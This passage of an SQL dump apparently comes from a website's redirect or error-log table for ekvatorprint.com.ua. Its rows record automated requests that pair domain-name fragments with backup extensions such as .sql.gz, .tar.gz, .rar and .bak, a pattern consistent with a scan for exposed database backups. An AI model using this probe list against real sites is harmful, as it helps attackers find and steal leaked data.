00:00:00',301),(22106,'https://ekvatorprint.com.ua/ekvato.sql.zip',NULL,'','',1,0,'2022-03-23 11:21:40','0000-00-00 00:00:00',301),(22107,'https://ekvatorprint.com.ua/ekvato.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:21:40','0000-00-00 00:00:00',301),(22108,'https://ekvatorprint.com.ua/ekvato.sql.tar',NULL,'','',1,0,'2022-03-23 11:21:41','0000-00-00 00:00:00',301),(22109,'https://ekvatorprint.com.ua/ekvato.7z',NULL,'','',1,0,'2022-03-23 11:21:41','0000-00-00 00:00:00',301),(22110,'https://ekvatorprint.com.ua/ekvato.gz',NULL,'','',1,0,'2022-03-23 11:21:41','0000-00-00 00:00:00',301),(22111,'https://ekvatorprint.com.ua/ekvator.sql',NULL,'','',1,0,'2022-03-23 11:21:42','0000-00-00 00:00:00',301),(22112,'https://ekvatorprint.com.ua/ekvator.tar',NULL,'','',1,0,'2022-03-23 11:21:42','0000-00-00 00:00:00',301),(22113,'https://ekvatorprint.com.ua/ekvator.tar.gz',NULL,'','',1,0,'2022-03-23 11:21:42','0000-00-00 00:00:00',301),(22114,'https://ekvatorprint.com.ua/ekvator.bz2',NULL,'','',1,0,'2022-03-23 11:21:42','0000-00-00 00:00:00',301),(22115,'https://ekvatorprint.com.ua/ekvator.rar',NULL,'','',2,0,'2022-03-23 11:21:43','0000-00-00 00:00:00',301),(22116,'https://ekvatorprint.com.ua/ekvator.bak',NULL,'','',1,0,'2022-03-23 11:21:43','0000-00-00 00:00:00',301),(22117,'https://ekvatorprint.com.ua/ekvator.zip',NULL,'','',1,0,'2022-03-23 11:21:43','0000-00-00 00:00:00',301),(22118,'https://ekvatorprint.com.ua/ekvator.sql.gz',NULL,'','',1,0,'2022-03-23 11:21:43','0000-00-00 00:00:00',301),(22119,'https://ekvatorprint.com.ua/ekvator.sql.zip',NULL,'','',1,0,'2022-03-23 11:21:43','0000-00-00 00:00:00',301),(22120,'https://ekvatorprint.com.ua/ekvator.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:21:44','0000-00-00 00:00:00',301),(22121,'https://ekvatorprint.com.ua/ekvator.sql.tar',NULL,'','',1,0,'2022-03-23 11:21:44','0000-00-00 00:00:00',301),(22122,'https://ekvatorprint.com.ua/ekvator.7z',NULL,'','',1,0,'2022-03-23 11:21:44','0000-00-00 00:00:00',301),(22123,'https://ekvatorprint.com.ua/ekvator.gz',NULL,'','',1,0,'2022-03-23 11:21:45','0000-00-00 00:00:00',301),(22124,'https://ekvatorprint.com.ua/ekvatorp.sql',NULL,'','',1,0,'2022-03-23 11:21:45','0000-00-00 00:00:00',301),(22125,'https://ekvatorprint.com.ua/ekvatorp.tar',NULL,'','',1,0,'2022-03-23 11:21:45','0000-00-00 00:00:00',301),(22126,'https://ekvatorprint.com.ua/ekvatorp.tar.gz',NULL,'','',1,0,'2022-03-23 11:21:45','0000-00-00 00:00:00',301),(22127,'https://ekvatorprint.com.ua/ekvatorp.bz2',NULL,'','',1,0,'2022-03-23 11:21:46','0000-00-00 00:00:00',301),(22128,'https://ekvatorprint.com.ua/ekvatorp.rar',NULL,'','',2,0,'2022-03-23 11:21:46','0000-00-00 00:00:00',301),(22129,'https://ekvatorprint.com.ua/ekvatorp.bak',NULL,'','',1,0,'2022-03-23 11:21:46','0000-00-00 00:00:00',301),(22130,'https://ekvatorprint.com.ua/ekvatorp.zip',NULL,'','',1,0,'2022-03-23 11:21:46','0000-00-00 00:00:00',301),(22131,'https://ekvatorprint.com.ua/ekvatorp.sql.gz',NULL,'','',1,0,'2022-03-23 11:21:47','0000-00-00 00:00:00',301),(22132,'https://ekvatorprint.com.ua/ekvatorp.sql.zip',NULL,'','',1,0,'2022-03-23 11:21:47','0000-00-00 00:00:00',301),(22133,'https://ekvatorprint.com.ua/ekvatorp.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:21:47','0000-00-00 00:00:00',301),(22134,'https://ekvatorprint.com.ua/ekvatorp.sql.tar',NULL,'','',1,0,'2022-03-23 11:21:47','0000-00-00 00:00:00',301),(22135,'https://ekvatorprint.com.ua/ekvatorp.7z',NULL,'','',1,0,'2022-03-23 11:21:48','0000-00-00 00:00:00',301),(22136,'https://ekvatorprint.com.ua/ekvatorp.gz',NULL,'','',1,0,'2022-03-23 11:21:48','0000-00-00 00:00:00',301),(22137,'https://ekvatorprint.com.ua/ekvatorpr.sql',NULL,'','',1,0,'2022-03-23 11:21:48','0000-00-00 00:00:00',301),(22138,'https://ekvatorprint.com.ua/ekvatorpr.tar',NULL,'','',1,0,'2022-03-23 11:21:49','0000-00-00 00:00:00',301),(22139,'https://ekvatorprint.com.ua/ekvatorpr.tar.gz',NULL,'','',1,0,'2022-03-23 11:21:49','0000-00-00 00:00:00',301),(22140,'https://ekvatorprint.com.ua/ekvatorpr.bz2',NULL,'','',1,0,'2022-03-23 11:21:49','0000-00-00 00:00:00',301),(22141,'https://ekvatorprint.com.ua/ekvatorpr.rar',NULL,'','',2,0,'2022-03-23 11:21:49','0000-00-00 00:00:00',301),(22142,'https://ekvatorprint.com.ua/ekvatorpr.bak',NULL,'','',1,0,'2022-03-23 11:21:50','0000-00-00 00:00:00',301),(22143,'https://ekvatorprint.com.ua/ekvatorpr.zip',NULL,'','',1,0,'2022-03-23 11:21:50','0000-00-00 00:00:00',301),(22144,'https://ekvatorprint.com.ua/ekvatorpr.sql.gz',NULL,'','',1,0,'2022-03-23 11:21:50','0000-00-00 00:00:00',301),(22145,'https://ekvatorprint.com.ua/ekvatorpr.sql.zip',NULL,'','',1,0,'2022-03-23 11:21:50','0000-00-00 00:00:00',301),(22146,'https://ekvatorprint.com.ua/ekvatorpr.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:21:51','0000-00-00 00:00:00',301),(22147,'https://ekvatorprint.com.ua/ekvatorpr.sql.tar',NULL,'','',1,0,'2022-03-23 11:21:51','0000-00-00 00:00:00',301),(22148,'https://ekvatorprint.com.ua/ekvatorpr.7z',NULL,'','',1,0,'2022-03-23 11:21:51','0000-00-00 00:00:00',301),(22149,'https://ekvatorprint.com.ua/ekvatorpr.gz',NULL,'','',1,0,'2022-03-23 11:21:52','0000-00-00 00:00:00',301),(22150,'https://ekvatorprint.com.ua/ekvatorpri.sql',NULL,'','',1,0,'2022-03-23 11:21:52','0000-00-00 00:00:00',301),(22151,'https://ekvatorprint.com.ua/ekvatorpri.tar',NULL,'','',1,0,'2022-03-23 11:21:52','0000-00-00 00:00:00',301),(22152,'https://ekvatorprint.com.ua/ekvatorpri.tar.gz',NULL,'','',1,0,'2022-03-23 11:21:52','0000-00-00 00:00:00',301),(22153,'https://ekvatorprint.com.ua/ekvatorpri.bz2',NULL,'','',1,0,'2022-03-23 11:21:53','0000-00-00 00:00:00',301),(22154,'https://ekvatorprint.com.ua/ekvatorpri.rar',NULL,'','',2,0,'2022-03-23 11:21:53','0000-00-00 00:00:00',301),(22155,'https://ekvatorprint.com.ua/ekvatorpri.bak',NULL,'','',1,0,'2022-03-23 11:21:53','0000-00-00 00:00:00',301),(22156,'https://ekvatorprint.com.ua/ekvatorpri.zip',NULL,'','',1,0,'2022-03-23 11:21:53','0000-00-00 00:00:00',301),(22157,'https://ekvatorprint.com.ua/ekvatorpri.sql.gz',NULL,'','',1,0,'2022-03-23 11:21:54','0000-00-00 00:00:00',301),(22158,'https://ekvatorprint.com.ua/ekvatorpri.sql.zip',NULL,'','',1,0,'2022-03-23 11:21:54','0000-00-00 00:00:00',301),(22159,'https://ekvatorprint.com.ua/ekvatorpri.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:21:54','0000-00-00 00:00:00',301),(22160,'https://ekvatorprint.com.ua/ekvatorpri.sql.tar',NULL,'','',1,0,'2022-03-23 11:21:54','0000-00-00 00:00:00',301),(22161,'https://ekvatorprint.com.ua/ekvatorpri.7z',NULL,'','',1,0,'2022-03-23 11:21:55','0000-00-00 00:00:00',301),(22162,'https://ekvatorprint.com.ua/ekvatorpri.gz',NULL,'','',1,0,'2022-03-23 11:21:55','0000-00-00 00:00:00',301),(22163,'https://ekvatorprint.com.ua/ekvatorprin.sql',NULL,'','',1,0,'2022-03-23 11:21:55','0000-00-00 00:00:00',301),(22164,'https://ekvatorprint.com.ua/ekvatorprin.tar',NULL,'','',1,0,'2022-03-23 11:21:56','0000-00-00 00:00:00',301),(22165,'https://ekvatorprint.com.ua/ekvatorprin.tar.gz',NULL,'','',1,0,'2022-03-23 11:21:56','0000-00-00 00:00:00',301),(22166,'https://ekvatorprint.com.ua/ekvatorprin.bz2',NULL,'','',1,0,'2022-03-23 11:21:57','0000-00-00 00:00:00',301),(22167,'https://ekvatorprint.com.ua/ekvatorprin.rar',NULL,'','',2,0,'2022-03-23 11:21:57','0000-00-00 00:00:00',301),(22168,'https://ekvatorprint.com.ua/ekvatorprin.bak',NULL,'','',1,0,'2022-03-23 11:21:57','0000-00-00 00:00:00',301),(22169,'https://ekvatorprint.com.ua/ekvatorprin.zip',NULL,'','',1,0,'2022-03-23 11:21:57','0000-00-00 00:00:00',301),(22170,'https://ekvatorprint.com.ua/ekvatorprin.sql.gz',NULL,'','',1,0,'2022-03-23 11:21:58','0000-00-00 00:00:00',301),(22171,'https://ekvatorprint.com.ua/ekvatorprin.sql.zip',NULL,'','',1,0,'2022-03-23 11:21:58','0000-00-00 00:00:00',301),(22172,'https://ekvatorprint.com.ua/ekvatorprin.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:21:58','0000-00-00 00:00:00',301),(22173,'https://ekvatorprint.com.ua/ekvatorprin.sql.tar',NULL,'','',1,0,'2022-03-23 11:21:58','0000-00-00 00:00:00',301),(22174,'https://ekvatorprint.com.ua/ekvatorprin.7z',NULL,'','',1,0,'2022-03-23 11:21:59','0000-00-00 00:00:00',301),(22175,'https://ekvatorprint.com.ua/ekvatorprin.gz',NULL,'','',1,0,'2022-03-23 11:21:59','0000-00-00 00:00:00',301),(22176,'https://ekvatorprint.com.ua/ekvatorprint.bz2',NULL,'','',1,0,'2022-03-23 11:22:00','0000-00-00 00:00:00',301),(22177,'https://ekvatorprint.com.ua/ekvatorprint.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:22:02','0000-00-00 00:00:00',301),(22178,'https://ekvatorprint.com.ua/ekvatorprint..sql',NULL,'','',1,0,'2022-03-23 11:22:04','0000-00-00 00:00:00',301),(22179,'https://ekvatorprint.com.ua/ekvatorprint..tar',NULL,'','',1,0,'2022-03-23 11:22:04','0000-00-00 00:00:00',301),(22180,'https://ekvatorprint.com.ua/ekvatorprint..tar.gz',NULL,'','',1,0,'2022-03-23 11:22:04','0000-00-00 00:00:00',301),(22181,'https://ekvatorprint.com.ua/ekvatorprint..bz2',NULL,'','',1,0,'2022-03-23 11:22:05','0000-00-00 00:00:00',301),(22182,'https://ekvatorprint.com.ua/ekvatorprint..rar',NULL,'','',2,0,'2022-03-23 11:22:05','0000-00-00 00:00:00',301),(22183,'https://ekvatorprint.com.ua/ekvatorprint..bak',NULL,'','',1,0,'2022-03-23 11:22:05','0000-00-00 00:00:00',301),(22184,'https://ekvatorprint.com.ua/ekvatorprint..zip',NULL,'','',1,0,'2022-03-23 11:22:05','0000-00-00 00:00:00',301),(22185,'https://ekvatorprint.com.ua/ekvatorprint..sql.gz',NULL,'','',1,0,'2022-03-23 11:22:06','0000-00-00 00:00:00',301),(22186,'https://ekvatorprint.com.ua/ekvatorprint..sql.zip',NULL,'','',1,0,'2022-03-23 11:22:06','0000-00-00 00:00:00',301),(22187,'https://ekvatorprint.com.ua/ekvatorprint..sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:22:06','0000-00-00 00:00:00',301),(22188,'https://ekvatorprint.com.ua/ekvatorprint..sql.tar',NULL,'','',1,0,'2022-03-23 11:22:06','0000-00-00 00:00:00',301),(22189,'https://ekvatorprint.com.ua/ekvatorprint..7z',NULL,'','',1,0,'2022-03-23 11:22:07','0000-00-00 00:00:00',301),(22190,'https://ekvatorprint.com.ua/ekvatorprint..gz',NULL,'','',1,0,'2022-03-23 11:22:07','0000-00-00 00:00:00',301),(22191,'https://ekvatorprint.com.ua/ekvatorprint.c.sql',NULL,'','',1,0,'2022-03-23 11:22:08','0000-00-00 00:00:00',301),(22192,'https://ekvatorprint.com.ua/ekvatorprint.c.tar',NULL,'','',1,0,'2022-03-23 11:22:08','0000-00-00 00:00:00',301),(22193,'https://ekvatorprint.com.ua/ekvatorprint.c.tar.gz',NULL,'','',1,0,'2022-03-23 11:22:08','0000-00-00 00:00:00',301),(22194,'https://ekvatorprint.com.ua/ekvatorprint.c.bz2',NULL,'','',1,0,'2022-03-23 11:22:08','0000-00-00 00:00:00',301),(22195,'https://ekvatorprint.com.ua/ekvatorprint.c.rar',NULL,'','',2,0,'2022-03-23 11:22:09','0000-00-00 00:00:00',301),(22196,'https://ekvatorprint.com.ua/ekvatorprint.c.bak',NULL,'','',1,0,'2022-03-23 11:22:09','0000-00-00 00:00:00',301),(22197,'https://ekvatorprint.com.ua/ekvatorprint.c.zip',NULL,'','',1,0,'2022-03-23 11:22:09','0000-00-00 00:00:00',301),(22198,'https://ekvatorprint.com.ua/ekvatorprint.c.sql.gz',NULL,'','',1,0,'2022-03-23 11:22:09','0000-00-00 00:00:00',301),(22199,'https://ekvatorprint.com.ua/ekvatorprint.c.sql.zip',NULL,'','',1,0,'2022-03-23 11:22:09','0000-00-00 00:00:00',301),(22200,'https://ekvatorprint.com.ua/ekvatorprint.c.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:22:10','0000-00-00 00:00:00',301),(22201,'https://ekvatorprint.com.ua/ekvatorprint.c.sql.tar',NULL,'','',1,0,'2022-03-23 11:22:10','0000-00-00 00:00:00',301),(22202,'https://ekvatorprint.com.ua/ekvatorprint.c.7z',NULL,'','',1,0,'2022-03-23 11:22:10','0000-00-00 00:00:00',301),(22203,'https://ekvatorprint.com.ua/ekvatorprint.c.gz',NULL,'','',1,0,'2022-03-23 11:22:11','0000-00-00 00:00:00',301),(22204,'https://ekvatorprint.com.ua/ekvatorprint.co.sql',NULL,'','',1,0,'2022-03-23 11:22:11','0000-00-00 00:00:00',301),(22205,'https://ekvatorprint.com.ua/ekvatorprint.co.tar',NULL,'','',1,0,'2022-03-23 11:22:11','0000-00-00 00:00:00',301),(22206,'https://ekvatorprint.com.ua/ekvatorprint.co.tar.gz',NULL,'','',1,0,'2022-03-23 11:22:11','0000-00-00 00:00:00',301),(22207,'https://ekvatorprint.com.ua/ekvatorprint.co.bz2',NULL,'','',1,0,'2022-03-23 11:22:12','0000-00-00 00:00:00',301),(22208,'https://ekvatorprint.com.ua/ekvatorprint.co.rar',NULL,'','',2,0,'2022-03-23 11:22:12','0000-00-00 00:00:00',301),(22209,'https://ekvatorprint.com.ua/ekvatorprint.co.bak',NULL,'','',1,0,'2022-03-23 11:22:12','0000-00-00 00:00:00',301),(22210,'https://ekvatorprint.com.ua/ekvatorprint.co.zip',NULL,'','',1,0,'2022-03-23 11:22:12','0000-00-00 00:00:00',301),(22211,'https://ekvatorprint.com.ua/ekvatorprint.co.sql.gz',NULL,'','',1,0,'2022-03-23 11:22:13','0000-00-00 00:00:00',301),(22212,'https://ekvatorprint.com.ua/ekvatorprint.co.sql.zip',NULL,'','',1,0,'2022-03-23 11:22:13','0000-00-00 00:00:00',301),(22213,'https://ekvatorprint.com.ua/ekvatorprint.co.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:22:13','0000-00-00 00:00:00',301),(22214,'https://ekvatorprint.com.ua/ekvatorprint.co.sql.tar',NULL,'','',1,0,'2022-03-23 11:22:13','0000-00-00 00:00:00',301),(22215,'https://ekvatorprint.com.ua/ekvatorprint.co.7z',NULL,'','',1,0,'2022-03-23 11:22:14','0000-00-00 00:00:00',301),(22216,'https://ekvatorprint.com.ua/ekvatorprint.co.gz',NULL,'','',1,0,'2022-03-23 11:22:14','0000-00-00 00:00:00',301),(22217,'https://ekvatorprint.com.ua/ekvatorprint.com.sql',NULL,'','',1,0,'2022-03-23 11:22:15','0000-00-00 00:00:00',301),(22218,'https://ekvatorprint.com.ua/ekvatorprint.com.tar',NULL,'','',1,0,'2022-03-23 11:22:15','0000-00-00 00:00:00',301),(22219,'https://ekvatorprint.com.ua/ekvatorprint.com.tar.gz',NULL,'','',1,0,'2022-03-23 11:22:15','0000-00-00 00:00:00',301),(22220,'https://ekvatorprint.com.ua/ekvatorprint.com.bz2',NULL,'','',1,0,'2022-03-23 11:22:15','0000-00-00 00:00:00',301),(22221,'https://ekvatorprint.com.ua/ekvatorprint.com.rar',NULL,'','',2,0,'2022-03-23 11:22:16','0000-00-00 00:00:00',301),(22222,'https://ekvatorprint.com.ua/ekvatorprint.com.bak',NULL,'','',1,0,'2022-03-23 11:22:16','0000-00-00 00:00:00',301),(22223,'https://ekvatorprint.com.ua/ekvatorprint.com.zip',NULL,'','',1,0,'2022-03-23 11:22:16','0000-00-00 00:00:00',301),(22224,'https://ekvatorprint.com.ua/ekvatorprint.com.sql.gz',NULL,'','',1,0,'2022-03-23 11:22:16','0000-00-00 00:00:00',301),(22225,'https://ekvatorprint.com.ua/ekvatorprint.com.sql.zip',NULL,'','',1,0,'2022-03-23 11:22:17','0000-00-00 00:00:00',301),(22226,'https://ekvatorprint.com.ua/ekvatorprint.com.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:22:17','0000-00-00 00:00:00',301),(22227,'https://ekvatorprint.com.ua/ekvatorprint.com.sql.tar',NULL,'','',1,0,'2022-03-23 11:22:17','0000-00-00 00:00:00',301),(22228,'https://ekvatorprint.com.ua/ekvatorprint.com.7z',NULL,'','',1,0,'2022-03-23 11:22:18','0000-00-00 00:00:00',301),(22229,'https://ekvatorprint.com.ua/ekvatorprint.com.gz',NULL,'','',1,0,'2022-03-23 11:22:18','0000-00-00 00:00:00',301),(22230,'https://ekvatorprint.com.ua/ekvatorprint.com..sql',NULL,'','',1,0,'2022-03-23 11:22:18','0000-00-00 00:00:00',301),(22231,'https://ekvatorprint.com.ua/ekvatorprint.com..tar',NULL,'','',1,0,'2022-03-23 11:22:18','0000-00-00 00:00:00',301),(22232,'https://ekvatorprint.com.ua/ekvatorprint.com..tar.gz',NULL,'','',1,0,'2022-03-23 11:22:18','0000-00-00 00:00:00',301),(22233,'https://ekvatorprint.com.ua/ekvatorprint.com..bz2',NULL,'','',1,0,'2022-03-23 11:22:19','0000-00-00 00:00:00',301),(22234,'https://ekvatorprint.com.ua/ekvatorprint.com..rar',NULL,'','',2,0,'2022-03-23 11:22:19','0000-00-00 00:00:00',301),(22235,'https://ekvatorprint.com.ua/ekvatorprint.com..bak',NULL,'','',1,0,'2022-03-23 11:22:19','0000-00-00 00:00:00',301),(22236,'https://ekvatorprint.com.ua/ekvatorprint.com..zip',NULL,'','',1,0,'2022-03-23 11:22:19','0000-00-00 00:00:00',301),(22237,'https://ekvatorprint.com.ua/ekvatorprint.com..sql.gz',NULL,'','',1,0,'2022-03-23 11:22:20','0000-00-00 00:00:00',301),(22238,'https://ekvatorprint.com.ua/ekvatorprint.com..sql.zip',NULL,'','',1,0,'2022-03-23 11:22:20','0000-00-00 00:00:00',301),(22239,'https://ekvatorprint.com.ua/ekvatorprint.com..sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:22:20','0000-00-00 00:00:00',301),(22240,'https://ekvatorprint.com.ua/ekvatorprint.com..sql.tar',NULL,'','',1,0,'2022-03-23 11:22:20','0000-00-00 00:00:00',301),(22241,'https://ekvatorprint.com.ua/ekvatorprint.com..7z',NULL,'','',1,0,'2022-03-23 11:22:21','0000-00-00 00:00:00',301),(22242,'https://ekvatorprint.com.ua/ekvatorprint.com..gz',NULL,'','',1,0,'2022-03-23 11:22:21','0000-00-00 00:00:00',301),(22243,'https://ekvatorprint.com.ua/ekvatorprint.com.u.sql',NULL,'','',1,0,'2022-03-23 11:22:21','0000-00-00 00:00:00',301),(22244,'https://ekvatorprint.com.ua/ekvatorprint.com.u.tar',NULL,'','',1,0,'2022-03-23 11:22:22','0000-00-00 00:00:00',301),(22245,'https://ekvatorprint.com.ua/ekvatorprint.com.u.tar.gz',NULL,'','',1,0,'2022-03-23 11:22:22','0000-00-00 00:00:00',301),(22246,'https://ekvatorprint.com.ua/ekvatorprint.com.u.bz2',NULL,'','',1,0,'2022-03-23 11:22:22','0000-00-00 00:00:00',301),(22247,'https://ekvatorprint.com.ua/ekvatorprint.com.u.rar',NULL,'','',2,0,'2022-03-23 11:22:22','0000-00-00 00:00:00',301),(22248,'https://ekvatorprint.com.ua/ekvatorprint.com.u.bak',NULL,'','',1,0,'2022-03-23 11:22:23','0000-00-00 00:00:00',301),(22249,'https://ekvatorprint.com.ua/ekvatorprint.com.u.zip',NULL,'','',1,0,'2022-03-23 11:22:23','0000-00-00 00:00:00',301),(22250,'https://ekvatorprint.com.ua/ekvatorprint.com.u.sql.gz',NULL,'','',1,0,'2022-03-23 11:22:24','0000-00-00 00:00:00',301),(22251,'https://ekvatorprint.com.ua/ekvatorprint.com.u.sql.zip',NULL,'','',1,0,'2022-03-23 11:22:24','0000-00-00 00:00:00',301),(22252,'https://ekvatorprint.com.ua/ekvatorprint.com.u.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:22:24','0000-00-00 00:00:00',301),(22253,'https://ekvatorprint.com.ua/ekvatorprint.com.u.sql.tar',NULL,'','',1,0,'2022-03-23 11:22:24','0000-00-00 00:00:00',301),(22254,'https://ekvatorprint.com.ua/ekvatorprint.com.u.7z',NULL,'','',1,0,'2022-03-23 11:22:25','0000-00-00 00:00:00',301),(22255,'https://ekvatorprint.com.ua/ekvatorprint.com.u.gz',NULL,'','',1,0,'2022-03-23 11:22:25','0000-00-00 00:00:00',301),(22256,'https://ekvatorprint.com.ua/ekvatorprint.com.ua.bz2',NULL,'','',2,0,'2022-03-23 11:22:26','0000-00-00 00:00:00',301),(22257,'https://ekvatorprint.com.ua/ekvatorprint.com.ua.rar',NULL,'','',11,0,'2022-03-23 11:22:26','0000-00-00 00:00:00',301),(22258,'https://ekvatorprint.com.ua/ekvatorprint.com.ua.bak',NULL,'','',3,0,'2022-03-23 11:22:27','0000-00-00 00:00:00',301),(22259,'https://ekvatorprint.com.ua/ekvatorprint.com.ua.7z',NULL,'','',4,0,'2022-03-23 11:22:28','0000-00-00 00:00:00',301),(22260,'https://ekvatorprint.com.ua/.sql',NULL,'','',1,0,'2022-03-23 11:22:29','0000-00-00 00:00:00',301),(22261,'https://ekvatorprint.com.ua/.tar',NULL,'','',1,0,'2022-03-23 11:22:29','0000-00-00 00:00:00',301),(22262,'https://ekvatorprint.com.ua/.tar.gz',NULL,'','',1,0,'2022-03-23 11:22:29','0000-00-00 00:00:00',301),(22263,'https://ekvatorprint.com.ua/.bz2',NULL,'','',1,0,'2022-03-23 11:22:30','0000-00-00 00:00:00',301),(22264,'https://ekvatorprint.com.ua/.rar',NULL,'','',2,0,'2022-03-23 11:22:30','0000-00-00 00:00:00',301),(22265,'https://ekvatorprint.com.ua/.bak',NULL,'','',1,0,'2022-03-23 11:22:30','0000-00-00 00:00:00',301),(22266,'https://ekvatorprint.com.ua/.sql.gz',NULL,'','',1,0,'2022-03-23 11:22:32','0000-00-00 00:00:00',301),(22267,'https://ekvatorprint.com.ua/.sql.zip',NULL,'','',1,0,'2022-03-23 11:22:32','0000-00-00 00:00:00',301),(22268,'https://ekvatorprint.com.ua/.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:22:32','0000-00-00 00:00:00',301),(22269,'https://ekvatorprint.com.ua/.sql.tar',NULL,'','',1,0,'2022-03-23 11:22:32','0000-00-00 00:00:00',301),(22270,'https://ekvatorprint.com.ua/.7z',NULL,'','',1,0,'2022-03-23 11:22:33','0000-00-00 00:00:00',301),(22271,'https://ekvatorprint.com.ua/.gz',NULL,'','',1,0,'2022-03-23 11:22:33','0000-00-00 00:00:00',301),(22272,'https://ekvatorprint.com.ua/a.sql',NULL,'','',3,0,'2022-03-23 11:22:33','0000-00-00 00:00:00',301),(22273,'https://ekvatorprint.com.ua/a.tar',NULL,'','',3,0,'2022-03-23 11:22:34','0000-00-00 00:00:00',301),(22274,'https://ekvatorprint.com.ua/a.tar.gz',NULL,'','',3,0,'2022-03-23 11:22:34','0000-00-00 00:00:00',301),(22275,'https://ekvatorprint.com.ua/a.bz2',NULL,'','',3,0,'2022-03-23 11:22:34','0000-00-00 00:00:00',301),(22276,'https://ekvatorprint.com.ua/a.rar',NULL,'','',6,0,'2022-03-23 11:22:34','0000-00-00 00:00:00',301),(22277,'https://ekvatorprint.com.ua/a.bak',NULL,'','',3,0,'2022-03-23 11:22:35','0000-00-00 00:00:00',301),(22278,'https://ekvatorprint.com.ua/a.zip',NULL,'','',3,0,'2022-03-23 11:22:35','0000-00-00 00:00:00',301),(22279,'https://ekvatorprint.com.ua/a.sql.gz',NULL,'','',3,0,'2022-03-23 11:22:35','0000-00-00 00:00:00',301),(22280,'https://ekvatorprint.com.ua/a.sql.zip',NULL,'','',3,0,'2022-03-23 11:22:35','0000-00-00 00:00:00',301),(22281,'https://ekvatorprint.com.ua/a.sql.tar.gz',NULL,'','',3,0,'2022-03-23 11:22:36','0000-00-00 00:00:00',301),(22282,'https://ekvatorprint.com.ua/a.sql.tar',NULL,'','',3,0,'2022-03-23 11:22:36','0000-00-00 00:00:00',301),(22283,'https://ekvatorprint.com.ua/a.7z',NULL,'','',3,0,'2022-03-23 11:22:36','0000-00-00 00:00:00',301),(22284,'https://ekvatorprint.com.ua/a.gz',NULL,'','',3,0,'2022-03-23 11:22:37','0000-00-00 00:00:00',301),(22285,'https://ekvatorprint.com.ua/ua.sql',NULL,'','',2,0,'2022-03-23 11:22:37','0000-00-00 00:00:00',301),(22286,'https://ekvatorprint.com.ua/ua.tar',NULL,'','',2,0,'2022-03-23 11:22:37','0000-00-00 00:00:00',301),(22287,'https://ekvatorprint.com.ua/ua.tar.gz',NULL,'','',2,0,'2022-03-23 11:22:37','0000-00-00 00:00:00',301),(22288,'https://ekvatorprint.com.ua/ua.bz2',NULL,'','',2,0,'2022-03-23 11:22:38','0000-00-00 00:00:00',301),(22289,'https://ekvatorprint.com.ua/ua.rar',NULL,'','',4,0,'2022-03-23 11:22:38','0000-00-00 00:00:00',301),(22290,'https://ekvatorprint.com.ua/ua.bak',NULL,'','',2,0,'2022-03-23 11:22:38','0000-00-00 00:00:00',301),(22291,'https://ekvatorprint.com.ua/ua.zip',NULL,'','',2,0,'2022-03-23 11:22:38','0000-00-00 00:00:00',301),(22292,'https://ekvatorprint.com.ua/ua.sql.gz',NULL,'','',2,0,'2022-03-23 11:22:39','0000-00-00 00:00:00',301),(22293,'https://ekvatorprint.com.ua/ua.sql.zip',NULL,'','',2,0,'2022-03-23 11:22:39','0000-00-00 00:00:00',301),(22294,'https://ekvatorprint.com.ua/ua.sql.tar.gz',NULL,'','',2,0,'2022-03-23 11:22:39','0000-00-00 00:00:00',301),(22295,'https://ekvatorprint.com.ua/ua.sql.tar',NULL,'','',2,0,'2022-03-23 11:22:39','0000-00-00 00:00:00',301),(22296,'https://ekvatorprint.com.ua/ua.7z',NULL,'','',2,0,'2022-03-23 11:22:40','0000-00-00 00:00:00',301),(22297,'https://ekvatorprint.com.ua/ua.gz',NULL,'','',2,0,'2022-03-23 11:22:40','0000-00-00 00:00:00',301),(22298,'https://ekvatorprint.com.ua/.ua.sql',NULL,'','',1,0,'2022-03-23 11:22:40','0000-00-00 00:00:00',301),(22299,'https://ekvatorprint.com.ua/.ua.tar',NULL,'','',1,0,'2022-03-23 11:22:41','0000-00-00 00:00:00',301),(22300,'https://ekvatorprint.com.ua/.ua.tar.gz',NULL,'','',1,0,'2022-03-23 11:22:41','0000-00-00 00:00:00',301),(22301,'https://ekvatorprint.com.ua/.ua.bz2',NULL,'','',1,0,'2022-03-23 11:22:41','0000-00-00 00:00:00',301),(22302,'https://ekvatorprint.com.ua/.ua.rar',NULL,'','',2,0,'2022-03-23 11:22:41','0000-00-00 00:00:00',301),(22303,'https://ekvatorprint.com.ua/.ua.bak',NULL,'','',1,0,'2022-03-23 11:22:42','0000-00-00 00:00:00',301),(22304,'https://ekvatorprint.com.ua/.ua.zip',NULL,'','',1,0,'2022-03-23 11:22:42','0000-00-00 00:00:00',301),(22305,'https://ekvatorprint.com.ua/.ua.sql.gz',NULL,'','',1,0,'2022-03-23 11:22:42','0000-00-00 00:00:00',301),(22306,'https://ekvatorprint.com.ua/.ua.sql.zip',NULL,'','',1,0,'2022-03-23 11:22:42','0000-00-00 00:00:00',301),(22307,'https://ekvatorprint.com.ua/.ua.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:22:43','0000-00-00 00:00:00',301),(22308,'https://ekvatorprint.com.ua/.ua.sql.tar',NULL,'','',1,0,'2022-03-23 11:22:43','0000-00-00 00:00:00',301),(22309,'https://ekvatorprint.com.ua/.ua.7z',NULL,'','',1,0,'2022-03-23 11:22:43','0000-00-00 00:00:00',301),(22310,'https://ekvatorprint.com.ua/.ua.gz',NULL,'','',1,0,'2022-03-23 11:22:44','0000-00-00 00:00:00',301),(22311,'https://ekvatorprint.com.ua/m.ua.sql',NULL,'','',1,0,'2022-03-23 11:22:44','0000-00-00 00:00:00',301),(22312,'https://ekvatorprint.com.ua/m.ua.tar',NULL,'','',1,0,'2022-03-23 11:22:44','0000-00-00 00:00:00',301),(22313,'https://ekvatorprint.com.ua/m.ua.tar.gz',NULL,'','',1,0,'2022-03-23 11:22:44','0000-00-00 00:00:00',301),(22314,'https://ekvatorprint.com.ua/m.ua.bz2',NULL,'','',1,0,'2022-03-23 11:22:45','0000-00-00 